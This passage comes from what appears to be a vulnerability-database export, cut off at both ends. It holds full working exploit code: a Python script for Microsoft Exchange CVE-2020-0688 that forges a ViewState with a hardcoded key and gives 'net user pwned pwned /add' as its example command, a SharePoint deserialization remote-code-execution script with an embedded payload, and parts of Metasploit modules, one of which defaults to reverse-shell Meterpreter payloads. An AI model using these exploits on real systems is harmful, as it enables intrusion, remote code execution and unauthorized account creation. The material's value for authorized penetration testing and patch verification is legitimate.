datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48168"}, {"lastseen": "2020-03-02T07:43:23", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-02T00:00:00", "published": "2020-03-02T00:00:00", "id": "EDB-ID:48153", "href": "https://www.exploit-db.com/exploits/48153", "type": "exploitdb", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Date: 2020-02-28\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48153"}, {"lastseen": "2020-02-11T23:35:50", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-21T00:00:00", "published": "2020-01-21T00:00:00", "id": "EDB-ID:48053", "href": "https://www.exploit-db.com/exploits/48053", "type": "exploitdb", "title": "Microsoft SharePoint - Deserialization Remote Code Execution", "sourceData": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nimport sys\r\nfrom xml.sax.saxutils import escape\r\nfrom lxml import html\r\nimport codecs\r\nimport readline\r\nfrom clint.arguments import Args\r\nimport signal\r\n\r\ndef serialize_command(cmd):\r\n total = \"\"\r\n for x in cmd:\r\n a = codecs.encode(x,\"utf-16be\")\r\n b = codecs.encode(a,\"hex\").decode('ascii')\r\n total += b[::-1]\r\n return total\r\n\r\ndef deserialize_command(cmd):\r\n length = len(cmd)\r\n s = \"\"\r\n for i in range(0,length,4):\r\n character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3]\r\n character = character[::-1]\r\n c_hex = codecs.decode(character,\"hex\")\r\n a = codecs.decode(c_hex,\"utf-16be\")\r\n s += a\r\n\t\t\r\n return s\r\n\r\n####################################### \r\nsignal.signal(signal.SIGINT, signal.default_int_handler)\r\nargs = Args()\r\n\r\nmyargs = dict(args.grouped)\r\nif '--help' in myargs or '-h' in myargs:\r\n help = \"\"\"\r\n desharialize options:\r\n -h --help - This menu\r\n -u --url - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx )\r\n -c --command - The command to run on the target Sharepoint server.\r\n -f --file - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping)\r\n \"\"\"\r\n print (help)\r\n exit(0)\r\n \r\nurl = ''\r\ncmd = ''\r\nfilename = ''\r\nif '--url' in myargs or '-u' in myargs:\r\n try:\r\n url = myargs['--url'][0]\r\n except:\r\n url = myargs['-u'][0]\r\n \r\nif '--command' in myargs or '-c' in myargs:\r\n if '--file' in myargs or '-f' in myargs:\r\n print(\"Can't use both command and file options at the same time!\")\r\n exit(0)\r\n try:\r\n cmd = myargs['--command'][0]\r\n except:\r\n cmd = myargs['-c'][0]\r\n\r\nif '--file' in myargs or '-f' in myargs:\r\n try:\r\n filename = myargs['--file'][0]\r\n except:\r\n filename = myargs['-f'][0]\r\n file = open(filename,mode='r')\r\n cmd = file.read()\r\n file.close()\r\n \r\n\r\nsharepoint2019and2016 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\r\nsharepoint2013 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\r\nsharepoint2010 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\r\n \r\nPY2 = sys.version_info[0] == 2\r\nPY3 = sys.version_info[0] == 3\r\n\r\nif PY3:\r\n string_types = str,\r\n raw_input = input\r\nelse:\r\n string_types = basestring,\r\n\r\nif url == '':\r\n url = raw_input(\"Enter the SharePoint Server URL ending with Picker.aspx:\")\r\n\r\nheaders = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',\r\n}\r\n\r\nfirstcall = requests.get(url,headers=headers)\r\nspheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16')\r\n\r\nspheader = int(spheader.split('.')[0])\r\n\r\npayload = \"__bpzzzz35009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b3006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b3000200c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300\"\r\n\r\nassemblyvalue = sharepoint2019and2016\r\n\r\nif spheader == 15:\r\n assemblyvalue = sharepoint2013\r\nelif spheader == 14:\r\n assemblyvalue = sharepoint2010\r\nelse:\r\n assemblyvalue = sharepoint2019and2016\r\n\r\nFullURL = url + assemblyvalue\r\n\r\nsecondcall = requests.get(FullURL,headers=headers)\r\nsecondcalltext = secondcall.text\r\n\r\ntree = html.fromstring(secondcall.content)\r\nviewstate = ''\r\neventvalidation = ''\r\ntry:\r\n viewstate = tree.get_element_by_id('__VIEWSTATE')\r\n viewstate = viewstate.value\r\nexcept:\r\n pass\r\n\r\ntry:\r\n eventvalidation = tree.get_element_by_id('__EVENTVALIDATION')\r\n eventvalidation = eventvalidation.value\r\nexcept:\r\n pass\r\n\r\n\r\nif cmd == '':\r\n cmd = raw_input(\"Write your full command here to execute on the test target system (Make sure you have permissions from system owner):\")\r\n\r\n\r\n#escapedcmd = escape(cmd,html_escape_table)\r\ncmd = cmd.replace(\"&\",\"&\")\r\ncmd = cmd.replace(\">\",\">\")\r\ncmd = cmd.replace(\"<\",\"<\")\r\ncmd = cmd.replace(\"\\\"\",\"\"\")\r\ncmd = cmd.replace(\"'\",\"&apos;\")\r\nescapedcmd = escape(cmd)\r\n\r\n\r\n\r\n\r\nprint(escapedcmd)\r\nsrlcmd = serialize_command(escapedcmd)\r\n\r\nlength = 1448 + len(escapedcmd)\r\nhex_length = format(length * 4,'x')\r\nserialized_length = hex_length[::-1]\r\n\r\npayload = payload.replace(\"e200e200e200140024003400e200e200e200\",srlcmd)\r\npayload = payload.replace(\"zzzz\",serialized_length)\r\n\r\nprint(\"Deserialized Payload:\")\r\nprint(deserialize_command(payload[8:]))\r\ndata = {\"__VIEWSTATE\":viewstate,\"__EVENTVALIDATION\":eventvalidation,\"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData\":payload}\r\nthirdcall = requests.post(FullURL, data=data,headers=headers)\r\n\r\nprint(\"Payload launched! Check execution results. Exiting...\")", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48053"}], "metasploit": [{"lastseen": "2020-05-30T19:56:22", "bulletinFamily": "exploit", "description": "This module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions < 10.0.474. Tested against 10.0.465 x64. Quoting the vendor's advisory on fixed versions: \"The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. In continuation of that, the complete fix for the remote code execution vulnerability is now available in build 10.0.479.\"\n", "modified": "2020-05-21T03:42:20", "published": "2020-03-10T07:08:16", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DESKTOPCENTRAL_DESERIALIZATION", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Java Deserialization", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n Quoting the vendor's advisory on fixed versions:\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of\n that, the complete fix for the remote code execution vulnerability is\n now available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => :certutil, # This works without issue\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8383),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central.')\n end\n\n build = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless build&.match(/\\d+/)\n return CheckCode::Detected(\n 'Target did not respond with Desktop Central build.'\n )\n end\n\n # Desktop Central build 100474 is equivalent to version 10.0.474\n if build.to_i < 100474\n return CheckCode::Appears(\n \"Desktop Central #{build} is a vulnerable build.\"\n )\n end\n\n CheckCode::Safe(\"Desktop Central #{build} is NOT a vulnerable build.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n 